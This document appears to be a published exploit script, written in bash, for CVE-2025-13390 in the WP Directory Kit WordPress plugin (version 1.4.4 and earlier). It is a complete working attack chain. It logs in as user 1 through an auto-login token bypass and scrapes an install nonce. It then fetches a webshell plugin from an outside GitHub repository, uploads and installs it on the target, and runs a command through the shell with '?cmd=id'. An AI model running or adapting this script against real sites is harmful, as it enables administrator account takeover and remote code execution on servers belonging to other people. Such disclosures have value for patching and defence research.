# WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover # Date: 11/09/2025 # Exploit Author: Ryan Kozak # Vendor Homepage: https://wordpress.org/plugins/wpdirectorykit/ # Version: <= 1.4.4 # CVE : CVE-2025-13390 #!/bin/bash TARGET="https://examplesite.com" echo "[*] Step 1: Auto-login and save cookies..." curl -s -L -c /tmp/wdk_cookies.txt "$TARGET/?auto-login=1&user_id=1&token=c4ca4238a0" > /dev/null echo "[+] Auto-login successful" echo "[*] Step 2: Getting nonce from plugin-install.php..." INSTALL_NONCE=$(curl -s -b /tmp/wdk_cookies.txt "$TARGET/wp-admin/plugin-install.php" | grep -oP 'name="_wpnonce" value="\K[^"]+' | head -1) echo "[+] Install Nonce: $INSTALL_NONCE" echo "[*] Step 3: Downloading plugin from GitHub..." curl -s -L "https://github.com/XK3NF4/webshell-plugin-wordpress/archive/refs/heads/main.zip" -o /tmp/webshell_github.zip echo "[*] Step 4: Extracting and repackaging plugin (WordPress needs plugin dir at ZIP root)..." cd /tmp unzip -q -o webshell_github.zip # The GitHub ZIP has: webshell-plugin-wordpress-main/wp_webshell/ # WordPress needs: wp_webshell/ at the root cd webshell-plugin-wordpress-main zip -q -r /tmp/webshell.zip wp_webshell/ cd /tmp rm -rf webshell-plugin-wordpress-main webshell_github.zip echo "[+] Plugin repackaged" echo "[*] Step 5: Uploading plugin..." UPLOAD_RESPONSE=$(curl -s -L -b /tmp/wdk_cookies.txt -c /tmp/wdk_cookies.txt \ -F "_wpnonce=$INSTALL_NONCE" \ -F "pluginzip=@/tmp/webshell.zip" \ -F "install-plugin-submit=Install Now" \ "$TARGET/wp-admin/update.php?action=upload-plugin") if echo "$UPLOAD_RESPONSE" | grep -qi "installed successfully\|Plugin installed"; then echo "[+] Plugin installed successfully" else echo "[-] Installation may have failed. Checking response..." echo "$UPLOAD_RESPONSE" | grep -i "error\|fail" | head -5 fi echo "[*] Step 6: Testing webshell..." WEBSHELL_URL="$TARGET/wp-content/plugins/wp_webshell/wp_webshell.php?cmd=id" echo "[*] Making request to: $WEBSHELL_URL" WEBSHELL_RESPONSE=$(curl -s "$WEBSHELL_URL") if [ -n "$WEBSHELL_RESPONSE" ]; then echo "[+] Webshell is accessible!" echo "[+] Response:" echo "$WEBSHELL_RESPONSE" else echo "[-] Webshell may not be accessible or returned empty response" fi # Cleanup rm -f /tmp/webshell.zip echo "[*] Cleanup complete"